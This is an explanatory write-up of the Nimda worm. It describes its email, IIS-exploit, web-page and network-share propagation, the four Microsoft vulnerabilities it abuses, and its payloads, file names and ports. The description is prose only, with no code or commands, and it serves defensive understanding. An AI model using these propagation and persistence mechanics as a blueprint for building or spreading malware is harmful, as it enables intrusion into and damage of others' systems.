Nimda Virus

Nimda Virus

• Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE.

• It affects Windows 95, 98, ME, NT4 and Windows 2000 users.

• Nimda is the first worm to modify existing web sites to strt offering infected files for download. It is also the first worm to use normal end user machines to scan for vulnerable web sites.

• Nimda uses the Unicode exploit to infect IIS Web servers.

"W32/Nimda-A," is more commonly known as the Nimda worm (aliases include Concept5, Code Rainbow, Minda) that affects Microsoft Windows 9x/ME, NT 4.0, and 2000. The name was chosen because it represents "Admin" spelled backwards. Nimda is a very aggressive self-propagating worm that distributes itself via the following four methods:

1. Email: The worm is delivered through email containing an attachment named "readme.exe" of the MIME-type "audio/x-wav." The email would only need to be previewed with a vulnerable client in order to trigger infection. The subject of the email is variable and may originate from spoofed email addresses under the guise of trusted sources.

2. Web server attacks: The worm attempts to search for and infect vulnerable IIS Web servers that have been compromised by the Code Red II worm backdoor root.exe. Nimda also seeks to gain control of the Web server via Unicode and Escaped Character Decoding vulnerabilities in IIS.

3. Web browsing code: Nimda appends code to all HTM, HTML, and ASP files residing on infected Web servers. Consequently, users browsing Web sites infected with Nimda may also fall victim to the worm.

4. Open network shares: Nimda is able to propagate via open network shares that have not been properly secured to deny access from unauthorized sources. This allows for the possibility of distribution within internal networks.

Nimda exploits four known Microsoft vulnerabilities:

• Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability http://www.securityfocus.com/bid/2708

• Microsoft IE MIME Header Attachment Execution Vulnerability http://www.securityfocus.com/bid/2524

• Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability http://www.securityfocus.com/bid/1806

• Microsoft Office 2000 DLL Execution Vulnerability http://www.securityfocus.com/bid/1699

Collateral damage and payloads attributed to the Nimda worm include but are not limited to the following:

1. Network performance degradation due to high bandwidth consumption during the propagation phase. Nimda has been spreading at an extremely rapid pace and Web site outages and impaired network connectivity have resulted from this worm.

2. Nimda creates or activates a "Guest" account and grants it administrative privileges.

3. The worm grants full access to everyone on the C: share. As a result, any unauthorized remote user may connect to this share and read, modify, or delete files on the system.

4. The Nimda worm enumerates shared network drives and scans recursively for executables. If it finds an executable file, it replaces it with a file of the same name containing the worm.

5. Nimda scans local hard drives for the file types HTM, HTML, and ASP and appends JavaScript code to further propagate the worm. The worm then creates the file readme.eml that contains a MIME-encoded version of Nimda in the same directory.

6. All sub keys of the registry key SYSTEM \CurrentControlSet\Services\lanmanserver \Shares\Security are deleted in order to circumvent network share security measures.

7. Nimda modifies the system.ini file so it can execute the worm automatically after system startup.

8. Nimda will create multiple instances of *.eml files and riched20.dll on open network shares even if HTML files are not present on the system. A copyright string appears in the worm that reads "Concept Virus (CV) V.5, Copyright(C) 2001 R.P.China." This string does not necessarily indicate the worm's origin.

Nimda uses several techniques to increase the effectiveness of its email propagation. First, it generates a list of email addresses from the Internet Explorer browser cache and the default MAPI mailbox (which is usually the Inbox for Outlook or Outlook Express). It also caches the subject of the messages found in the MAPI mailbox. It then uses one address at random to be the source of the emails it sends. Nimda also includes its own SMTP client, which will contact the appropriate mail servers for the various targets.

The worm tries several backdoors left by Code Red II, as well as a few other standard attacks. The worm uses regular blocking socket calls. Once the worm finds a vulnerable IIS server, it instructs it to download "admin.dll" from the attacking machine, via TFTP. It does this by sending an attack URL with the TFTP command embedded. It then executes "admin.dll" by sending a URL designed to call the DLL.

The most common file names used by the worm are as follows:

• readme.exe: The name of the worm used in email propagation.

• readme.eml: The name of the worm used in the propagation by modified Web pages.

• admin.dll: The file name used during the TFTP transfer from the attacking machine to the victim's. The file is copied to the root directory of all drives. A valid admin.dll exists, because it is a part of the FrontPage Server Extensions package.

• mmc.exe: File name used by the worm during initial setup. This file will be found in %Windows\System%. "mmc.exe" is the executable for the Microsoft Management Console. The worm overwrites it if it exists.

• load.exe: File name used by the worm as it copies itself in %Windows \System%.

• riched20.dll: The worm infects or replaces this DLL file. Because various office tools use this file, including Microsoft Word and WordPad, the worm infects these programs if they start within that directory.

As the worm is self-modifying, MD5 checksums are not useful in this instance. Most of those files will be 57,344 bytes in length, but they can be large if they are attached to an infected program. The infected copies are capable of spreading with the other files attached. It is theoretically possible that a hybrid will be accidentally created as well, if Nimda manages to infect a malicious piece of code and carry it along.

Port Numbers Involved

• TCP 137–139, 445: NetBIOS File Shares. These ports are used in the transmission of the worm.

• TCP 80: Hypertext Transfer Protocol. The worm uses this port to target machines, and as a carrier, through infected HTML or ASP files.

• TCP 25 SMTP: This port is used to send email to targets in the address book.

• UDP 69 TFTP: This port is used to transfer the worm, once a vulnerable machine is found through direct IP targeting.